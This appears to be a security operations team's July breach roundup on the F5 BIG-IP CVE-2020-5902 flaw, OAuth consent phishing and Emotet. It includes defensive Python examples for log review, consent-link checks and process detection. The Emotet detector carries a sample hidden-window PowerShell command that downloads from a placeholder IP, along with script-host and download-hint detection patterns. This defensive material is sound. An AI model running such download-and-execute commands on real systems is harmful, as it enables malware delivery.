A Month In Breaches: July

This is an initiative by our Security Operations Centre team who have their eyes on the prize 24/7 and are proactively observing breaches and critical security trends.

Part of protecting our clients is also promoting good security practices and raising awareness of current security trends. We hope this will give some extra boost to your overall understanding of security breaches happening in the expansive and scary internet.

F5 BIG IP VULNERABILITY CVE-2020-5902

The Traffic Management User Interface (TMUI) of F5 BIG-IP has a Remote Code Execution (RCE) vulnerability in undisclosed pages. This vulnerability allows unauthenticated attackers, or authenticated users, with network access to the Configuration utility through the BIG-IP management port and/or self IPs to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code. It can also result in a full system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected. Please check the source below to find vulnerable versions.

Researchers said that as of July 15, there were at least 8,041 vulnerable TMUI instances still exposed to the public internet. To ensure that your version of F5 BIG-IP is secure, CTRL Group recommends installing the patched version immediately; this eliminates the vulnerability. If installing a patch is not possible, block all access to the Configuration utility of your BIG-IP system through self IPs. In addition, you should permit management access to F5 products only over a secure network. Further alternatives can be found in the link provided in the source below.
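One way to verify the last two mitigations against your own access logs, as an added example that is not part of the original post: it assumes a common-log-format access log, a management network of 10.10.0.0/24, and the /tmui/ and /mgmt/ prefixes for the control plane, and reports every control-plane request that came from anywhere else.

```python
import ipaddress
import re

# Constructed sample access-log lines (not real BIG-IP logs), common log format.
SAMPLE_LOG = """\
10.10.0.5 - - [15/Jul/2020:09:12:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 3120
203.0.113.44 - - [15/Jul/2020:09:12:07 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 3120
198.51.100.9 - - [15/Jul/2020:09:13:40 +0000] "POST /tmui/login.jsp HTTP/1.1" 302 0
10.10.0.7 - - [15/Jul/2020:09:14:02 +0000] "GET /mgmt/tm/sys/version HTTP/1.1" 200 880
203.0.113.44 - - [15/Jul/2020:09:15:11 +0000] "GET /mgmt/tm/sys/version HTTP/1.1" 401 120
10.10.0.5 - - [15/Jul/2020:09:16:30 +0000] "GET /healthcheck HTTP/1.1" 200 2
"""
# Assumed: the only network that should ever reach the control plane.
MGMT_NETWORKS = [ipaddress.ip_network("10.10.0.0/24")]
# Assumed control-plane URL prefixes (Configuration utility, REST API); adjust to your deployment.
CONTROL_PLANE_PREFIXES = ("/tmui/", "/mgmt/")
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def is_management_ip(ip):
    """True if the client address is inside an approved management network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in MGMT_NETWORKS)

def find_external_control_plane_access(log_text):
    """Return every control-plane request that did not come from a management network."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash on them
        if not m.group("path").startswith(CONTROL_PLANE_PREFIXES):
            continue  # data-plane or unrelated request
        if is_management_ip(m.group("ip")):
            continue  # expected administrative traffic
        findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "request": f'{m.group("method")} {m.group("path")}',
                         "status": int(m.group("status"))})
    return findings

def offending_sources(log_text):
    """Distinct non-management addresses that reached the control plane, sorted."""
    return sorted({f["ip"] for f in find_external_control_plane_access(log_text)})

if __name__ == "__main__":
    for f in find_external_control_plane_access(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} -> {f['request']} ({f['status']})")
    print("sources to investigate or block:", offending_sources(SAMPLE_LOG))
```

A non-empty result means the Configuration utility is reachable from outside the management network and the blocking step above has not taken effect.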

MICROSOFT OAUTH ATTACKS AGAINST CLOUD APP USERS

OAuth is an open standard for access delegation. It is generally used as a way for people to sign into services without entering a password. The most evident instance might be the “Sign in with Google” or “Sign in with Facebook” buttons that many websites use. These “Sign in” or “Log in” prompts are called consent prompts. According to Microsoft, a type of application-based attack that takes advantage of OAuth authentication is on the rise. These attacks are categorised as Consent Phishing. Instead of stealing passwords, this attack focuses on seeking permission for an attacker-controlled application to access sensitive information. It begins with the attacker registering a malicious app with an OAuth2 provider. This application looks and feels trustworthy, but in reality it is not. A link to this application is then distributed using conventional phishing methods such as emails. If a user clicks accept, they grant the bad app permissions to access their credentials and potentially other sensitive data.

It might feel like an extra step, but ensuring the legitimacy of the application you are signing into could protect you from these spiking attacks. Attackers spoof app names to make them look genuine, so always make sure you recognise the app name and URL before you consent to it. These times are especially critical because of the global pandemic we are facing. People working from home are making more use of cloud-based apps and authenticating to them via OAuth. If organisations and their employees are trained to be more diligent in their actions, it can prove highly valuable for the security of sensitive data.
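The "recognise the app name and URL" check, written out as an added example that is not part of the original post: it pulls the application id, redirect host and requested permissions out of a consent link and compares them with an allowlist. The client ids, redirect hosts and sample links are constructed placeholders; the permission names are Microsoft Graph style delegated scopes used for illustration.

```python
from urllib.parse import urlparse, parse_qs

# Assumed: an allowlist of app (client) ids the organisation has vetted, keyed to the
# display name users should expect, and the redirect hosts those apps legitimately use.
# The ids and hosts below are constructed placeholders.
KNOWN_CLIENT_IDS = {"11111111-2222-3333-4444-555555555555": "Corp Expense Tracker"}
TRUSTED_REDIRECT_HOSTS = {"expenses.example.com"}
# Delegated permission names (Microsoft Graph style) that grant broad or persistent access.
HIGH_RISK_SCOPES = {"offline_access", "Mail.Read", "Mail.ReadWrite",
                    "Files.Read.All", "Contacts.Read"}

# Constructed sample consent links: one for the vetted app, one as a look-alike.
LEGIT_URL = ("https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
             "?client_id=11111111-2222-3333-4444-555555555555&response_type=code"
             "&redirect_uri=https%3A%2F%2Fexpenses.example.com%2Fcallback"
             "&scope=openid+profile+User.Read")
LOOKALIKE_URL = ("https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
                 "?client_id=99999999-8888-7777-6666-555555555555&response_type=code"
                 "&redirect_uri=https%3A%2F%2Fexpenses-example.co%2Fcallback"
                 "&scope=openid+offline_access+Mail.Read+Files.Read.All")

def inspect_consent_url(url):
    """Break a consent link into the facts a user (or helpdesk) should check before accepting."""
    parts = urlparse(url)
    qs = parse_qs(parts.query)
    client_id = qs.get("client_id", [""])[0]
    redirect_uri = qs.get("redirect_uri", [""])[0]
    scopes = set(qs.get("scope", [""])[0].split())
    redirect_host = (urlparse(redirect_uri).hostname or "").lower()
    warnings = []
    if client_id not in KNOWN_CLIENT_IDS:
        warnings.append("client_id is not a vetted application")
    if redirect_host not in TRUSTED_REDIRECT_HOSTS:
        warnings.append(f"redirect host not trusted: {redirect_host}")
    risky = sorted(scopes & HIGH_RISK_SCOPES)
    if risky:
        warnings.append("high-risk permissions requested: " + ", ".join(risky))
    return {
        "authority": parts.hostname,
        "app_name": KNOWN_CLIENT_IDS.get(client_id, "<unknown app>"),
        "redirect_host": redirect_host,
        "scopes": sorted(scopes),
        "risky_scopes": risky,
        "warnings": warnings,
    }

if __name__ == "__main__":
    for name, url in (("vetted app", LEGIT_URL), ("look-alike", LOOKALIKE_URL)):
        print(name, inspect_consent_url(url))
```

Note that both links point at the genuine identity provider; the consent page itself is real, so only the app identity and the permissions it asks for tell the two apart.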

EMOTET MALWARE

The Emotet malware threat has resurfaced after a five-month hiatus, with more than 250,000 malspam messages being sent to email recipients worldwide. Emotet is a Trojan that is primarily spread through spam emails. The infection may arrive via a malicious script, document files, or a malicious link. Emotet emails may contain familiar branding designed to look like a legitimate email. For instance, one email contains a Word document called “Invoice – 24 Jul, 2020.doc”. The document contains a script that asks recipients to enable it. Once the script is launched, it generates PowerShell scripts to download the Emotet malware from remote malicious websites. It can steal data, such as user credentials stored in the browser, by eavesdropping on network traffic. Once Emotet has infected a machine on the network, it propagates by enumerating network resources, writing to shared drives, and brute-forcing user accounts.

To protect against Emotet, patch any unsecured machines and ensure everything has the latest endpoint protection; this can dramatically reduce the risk of infection. Also, double-check the email sender and be cautious when opening links and attached files. If you suspect that one of the machines in the network is infected by Emotet, the recommendation is as follows. First, disconnect the infected machines from the network immediately. Second, run a virus scan and patch for EternalBlue, as Emotet drops Trickbot, which uses EternalBlue to propagate. Last, disable administrative shares and change account credentials. More information can be found on the following link.
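A detection for the infection chain described above (an Office document whose script launches PowerShell to fetch the payload), as an added example that is not part of the original post: it runs over constructed process-creation events with assumed field names and flags an Office parent spawning a script host, raising the severity when a hidden window or a download hint appears on the command line.

```python
# Constructed sample process-creation events (not real telemetry); field names are assumed.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "alice", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" "C:\Users\alice\Downloads\Invoice - 24 Jul, 2020.doc"'},
    {"host": "WS01", "user": "alice",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -Command Invoke-WebRequest http://203.0.113.10/... -OutFile ..."},
    {"host": "WS02", "user": "bob", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"host": "WS03", "user": "carol",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c echo macro-test"},
]
# Office applications that should almost never launch a script interpreter directly.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Substrings that suggest the script is fetching a second stage from the internet.
DOWNLOAD_HINTS = ("http://", "https://", "downloadfile", "downloadstring", "invoke-webrequest")

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def assess(ev):
    """Return (severity, reasons) for one event; severity is None when nothing matches."""
    parent, child = basename(ev["parent"]), basename(ev["image"])
    if parent not in OFFICE_APPS or child not in SCRIPT_HOSTS:
        return None, []
    reasons = [f"{parent} spawned {child}"]
    cmd = ev["cmdline"].lower()
    if "-windowstyle hidden" in cmd:
        reasons.append("hidden window requested")
    if any(h in cmd for h in DOWNLOAD_HINTS):
        reasons.append("download/URL hint in command line")
    return ("high" if len(reasons) > 1 else "medium"), reasons

def detect(events):
    """Findings for every event that matches the Office-to-script-host pattern, in input order."""
    findings = []
    for ev in events:
        severity, reasons = assess(ev)
        if severity:
            findings.append({"host": ev["host"], "user": ev["user"],
                             "severity": severity, "reasons": reasons})
    return findings
```

A "high" finding is the cue for the first response step above: disconnect that host from the network before scanning it.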


– CTRL GROUP SECURITY OPERATIONS CENTRE ANALYSTS, M-Singh & V-MSK